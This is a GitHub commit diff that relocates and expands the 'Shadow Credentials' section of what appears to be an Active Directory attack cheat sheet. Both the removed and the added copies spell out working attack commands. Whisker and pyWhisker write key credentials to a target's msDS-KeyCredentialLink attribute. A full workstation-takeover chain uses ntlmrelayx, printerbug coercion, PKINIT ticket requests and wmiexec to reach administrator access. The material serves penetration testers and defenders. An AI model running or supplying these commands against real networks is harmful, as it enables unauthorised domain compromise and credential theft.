-
-
Notifications
You must be signed in to change notification settings - Fork 15.1k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
e386a11
commit 835d6ff
Showing
2 changed files
with
76 additions
and
64 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
|
|
@@ -58,7 +58,6 @@ | |
| - [Pass-the-Ticket Silver Tickets](#pass-the-ticket-silver-tickets) | ||
| - [Kerberoasting](#kerberoasting) | ||
| - [KRB_AS_REP Roasting](#krbasrep-roasting) | ||
| - [Shadow Credentials](#shadow-credentials) | ||
| - [Pass-the-Hash](#pass-the-hash) | ||
| - [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key) | ||
| - [Using impacket](#using-impacket) | ||
|
|
@@ -85,6 +84,7 @@ | |
| - [ESC8 - AD CS Relay Attack](#esc8---ad-cs-relay-attack) | ||
| - [Certifried CVE-2022-26923](#certifried-cve-2022-26923) | ||
| - [Pass-The-Certificate](#pass-the-certificate) | ||
| - [Shadow Credentials](#shadow-credentials) | ||
| - [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage) | ||
| - [Abusing DNS Admins Group](#abusing-dns-admins-group) | ||
| - [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces) | ||
|
|
@@ -1837,68 +1837,6 @@ C:\Rubeus> john --format=krb5asrep --wordlist=passwords_kerb.txt hashes.asreproa | |
| * All accounts must have "Kerberos Pre-Authentication" enabled (Enabled by Default). | ||
|
|
||
|
|
||
| ### Shadow Credentials | ||
|
|
||
| > Add **Key Credentials** to the attribute `msDS-KeyCredentialLink` of the target user/computer object and then perform Kerberos authentication as that account using PKINIT to obtain a TGT for that user. | ||
| :warning: User objects can't edit their own `msDS-KeyCredentialLink` attribute while computer objects can. Computer objects can edit their own msDS-KeyCredentialLink attribute but can only add a KeyCredential if none already exists | ||
|
|
||
| **Requirements**: | ||
| * Domain Controller on (at least) Windows Server 2016 | ||
| * PKINIT Kerberos authentication | ||
| * An account with the delegated rights to write to the `msDS-KeyCredentialLink` attribute of the target object | ||
|
|
||
| **Exploitation**: | ||
| - From Windows, use [Whisker](https://github.com/eladshamir/Whisker): | ||
| ```powershell | ||
| # Lists all the entries of the msDS-KeyCredentialLink attribute of the target object. | ||
| Whisker.exe list /target:computername$ | ||
| # Generates a public-private key pair and adds a new key credential to the target object as if the user enrolled to WHfB from a new device. | ||
| Whisker.exe add /target:"TARGET_SAMNAME" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /path:"cert.pfx" /password:"pfx-password" | ||
| Whisker.exe add /target:computername$ [/domain:constoso.local /dc:dc1.contoso.local /path:C:\path\to\file.pfx /password:P@ssword1] | ||
| # Removes a key credential from the target object specified by a DeviceID GUID. | ||
| Whisker.exe remove /target:computername$ /domain:constoso.local /dc:dc1.contoso.local /remove:2de4643a-2e0b-438f-a99d-5cb058b3254b | ||
| ``` | ||
|
|
||
| - From Linux, use [pyWhisker](https://github.com/ShutdownRepo/pyWhisker): | ||
| ```bash | ||
| # Lists all the entries of the msDS-KeyCredentialLink attribute of the target object. | ||
| python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "list" | ||
| # Generates a public-private key pair and adds a new key credential to the target object as if the user enrolled to WHfB from a new device. | ||
| pywhisker.py -d "FQDN_DOMAIN" -u "user1" -p "CERTIFICATE_PASSWORD" --target "TARGET_SAMNAME" --action "list" | ||
| python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "add" --filename "test1" | ||
| # Removes a key credential from the target object specified by a DeviceID GUID. | ||
| python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "remove" --device-id "a8ce856e-9b58-61f9-8fd3-b079689eb46e" | ||
| ``` | ||
|
|
||
| **Scenario**: | ||
|
|
||
| - Scenario: Shadow Credential relaying | ||
| - Trigger an NTLM authentication from `DC01` (PetitPotam) | ||
| - Relay it to `DC02` (ntlmrelayx) | ||
| - Edit `DC01`'s attribute to create a Kerberos PKINIT pre-authentication backdoor (pywhisker) | ||
| - Alternatively : `ntlmrelayx -t ldap://dc02 --shadow-credentials --shadow-target 'dc01$'` | ||
| - Scenario: Workstation Takeover with RBCD | ||
| ```ps1 | ||
| # Only for C2: Add Reverse Port Forward from 8081 to Team Server 81 | ||
| # Set up ntlmrelayx to relay authentication from target workstation to DC | ||
| proxychains python3 ntlmrelayx.py -t ldaps://dc1.ez.lab --shadow-credentials --shadow-target ws2\$ --http-port 81 | ||
| # Execute printer bug to trigger authentication from target workstation | ||
| proxychains python3 printerbug.py ez.lab/matt:Password1\[email protected] ws1@8081/file | ||
| # Get a TGT using the newly acquired certificate via PKINIT | ||
| proxychains python3 gettgtpkinit.py ez.lab/ws2\$ ws2.ccache -cert-pfx /opt/impacket/examples/T12uyM5x.pfx -pfx-pass 5j6fNfnsU7BkTWQOJhpR | ||
| # Get a TGS for the target account | ||
| proxychains python3 gets4uticket.py kerberos+ccache://ez.lab\\ws2\$:[email protected] cifs/[email protected] [email protected] administrator_tgs.ccache -v | ||
| # Utilize the TGS for future activity | ||
| export KRB5CCNAME=/opt/pkinittools/administrator_ws2.ccache | ||
| proxychains python3 wmiexec.py -k -no-pass ez.lab/[email protected] | ||
| ``` | ||
|
|
||
| ### Pass-the-Hash | ||
|
|
||
| The types of hashes you can use with Pass-The-Hash are NT or NTLM hashes. Since Windows Vista, attackers have been unable to pass-the-hash to local admin accounts that weren’t the built-in RID 500. | ||
|
|
@@ -2594,6 +2532,71 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101 | |
| ``` | ||
|
|
||
|
|
||
| ### Shadow Credentials | ||
|
|
||
| > Add **Key Credentials** to the attribute `msDS-KeyCredentialLink` of the target user/computer object and then perform Kerberos authentication as that account using PKINIT to obtain a TGT for that user. When trying to pre-authenticate with PKINIT, the KDC will check that the authenticating user has knowledge of the matching private key, and a TGT will be sent if there is a match. | ||
| :warning: User objects can't edit their own `msDS-KeyCredentialLink` attribute while computer objects can. Computer objects can edit their own msDS-KeyCredentialLink attribute but can only add a KeyCredential if none already exists | ||
|
|
||
| **Requirements**: | ||
| * Domain Controller on (at least) Windows Server 2016 | ||
| * Domain must have Active Directory `Certificate Services` and `Certificate Authority` configured | ||
| * PKINIT Kerberos authentication | ||
| * An account with the delegated rights to write to the `msDS-KeyCredentialLink` attribute of the target object | ||
|
|
||
| **Exploitation**: | ||
| - From Windows, use [Whisker](https://github.com/eladshamir/Whisker): | ||
| ```powershell | ||
| # Lists all the entries of the msDS-KeyCredentialLink attribute of the target object. | ||
| Whisker.exe list /target:computername$ | ||
| # Generates a public-private key pair and adds a new key credential to the target object as if the user enrolled to WHfB from a new device. | ||
| Whisker.exe add /target:"TARGET_SAMNAME" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /path:"cert.pfx" /password:"pfx-password" | ||
| Whisker.exe add /target:computername$ [/domain:constoso.local /dc:dc1.contoso.local /path:C:\path\to\file.pfx /password:P@ssword1] | ||
| # Removes a key credential from the target object specified by a DeviceID GUID. | ||
| Whisker.exe remove /target:computername$ /domain:constoso.local /dc:dc1.contoso.local /remove:2de4643a-2e0b-438f-a99d-5cb058b3254b | ||
| ``` | ||
|
|
||
| - From Linux, use [pyWhisker](https://github.com/ShutdownRepo/pyWhisker): | ||
| ```bash | ||
| # Lists all the entries of the msDS-KeyCredentialLink attribute of the target object. | ||
| python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "list" | ||
| # Generates a public-private key pair and adds a new key credential to the target object as if the user enrolled to WHfB from a new device. | ||
| pywhisker.py -d "FQDN_DOMAIN" -u "user1" -p "CERTIFICATE_PASSWORD" --target "TARGET_SAMNAME" --action "list" | ||
| python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "add" --filename "test1" | ||
| # Removes a key credential from the target object specified by a DeviceID GUID. | ||
| python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "remove" --device-id "a8ce856e-9b58-61f9-8fd3-b079689eb46e" | ||
| ``` | ||
|
|
||
| **Scenario**: | ||
|
|
||
| - **Scenario 1**: Shadow Credential relaying | ||
| - Trigger an NTLM authentication from `DC01` (PetitPotam) | ||
| - Relay it to `DC02` (ntlmrelayx) | ||
| - Edit `DC01`'s attribute to create a Kerberos PKINIT pre-authentication backdoor (pywhisker) | ||
| - Alternatively : `ntlmrelayx -t ldap://dc02 --shadow-credentials --shadow-target 'dc01$'` | ||
|
|
||
| - **Scenario 2**: Workstation Takeover with RBCD | ||
| ```ps1 | ||
| # Only for C2: Add Reverse Port Forward from 8081 to Team Server 81 | ||
| # Set up ntlmrelayx to relay authentication from target workstation to DC | ||
| proxychains python3 ntlmrelayx.py -t ldaps://dc1.ez.lab --shadow-credentials --shadow-target ws2\$ --http-port 81 | ||
| # Execute printer bug to trigger authentication from target workstation | ||
| proxychains python3 printerbug.py ez.lab/matt:Password1\[email protected] ws1@8081/file | ||
| # Get a TGT using the newly acquired certificate via PKINIT | ||
| proxychains python3 gettgtpkinit.py ez.lab/ws2\$ ws2.ccache -cert-pfx /opt/impacket/examples/T12uyM5x.pfx -pfx-pass 5j6fNfnsU7BkTWQOJhpR | ||
| # Get a TGS for the target account | ||
| proxychains python3 gets4uticket.py kerberos+ccache://ez.lab\\ws2\$:[email protected] cifs/[email protected] [email protected] administrator_tgs.ccache -v | ||
| # Utilize the TGS for future activity | ||
| export KRB5CCNAME=/opt/pkinittools/administrator_ws2.ccache | ||
| proxychains python3 wmiexec.py -k -no-pass ez.lab/[email protected] | ||
| ``` | ||
|
|
||
|
|
||
| ### Dangerous Built-in Groups Usage | ||
|
|
||
| If you do not want modified ACLs to be overwritten every hour, you should change ACL template on the object `CN=AdminSDHolder,CN=System` or set `"dminCount` attribute to `0` for the required object. | ||
|
|
@@ -3863,4 +3866,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae | |
| * [Certifried: Active Directory Domain Privilege Escalation (CVE-2022–26923) - Oliver Lyak](https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4) | ||
| * [bloodyAD and CVE-2022-26923 - soka - 11 May 2022](https://cravaterouge.github.io/ad/privesc/2022/05/11/bloodyad-and-CVE-2022-26923.html) | ||
| * [DIVING INTO PRE-CREATED COMPUTER ACCOUNTS - May 10, 2022 - By Oddvar Moe](https://www.trustedsec.com/blog/diving-into-pre-created-computer-accounts/) | ||
| * [How NOT to use the PAM trust - Leveraging Shadow Principals for Cross Forest Attacks - Thursday, April 18, 2019 - Nikhil SamratAshok Mittal](http://www.labofapenetrationtester.com/2019/04/abusing-PAM.html) | ||
| * [How NOT to use the PAM trust - Leveraging Shadow Principals for Cross Forest Attacks - Thursday, April 18, 2019 - Nikhil SamratAshok Mittal](http://www.labofapenetrationtester.com/2019/04/abusing-PAM.html) | ||
| * [Shadow Credentials - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials) | ||